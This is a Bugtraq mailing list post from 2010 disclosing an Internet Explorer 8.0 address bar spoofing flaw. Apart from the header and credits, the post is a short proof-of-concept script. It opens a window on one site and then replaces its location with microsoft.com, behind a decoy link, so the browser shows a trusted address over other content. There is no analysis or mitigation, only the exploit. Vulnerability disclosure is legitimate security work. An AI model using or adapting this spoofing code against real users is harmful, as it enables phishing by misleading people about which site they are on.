Bugtraq mailing list archives

Internet Explorer 8.0 Address Bar Spoofing Vulnerability


From: info () securitylab ir
Date: 24 Jul 2010 11:08:33 -0000

Spoof Code:

<script>
function Spoof() {
  oc=window.open('http://www.securitylab.ir/&apos;, '','location=1');
  oc.location.replace('http://www.microsoft.com/&apos;);
}
</script>
<p align="center">
<a href="javascript:void(0);" onClick="Spoof()">Go to the Securitylab.ir</a></p>


Discovered by: Pouya Daneshmand 
http://Securitylab.ir/Advisories


Current thread: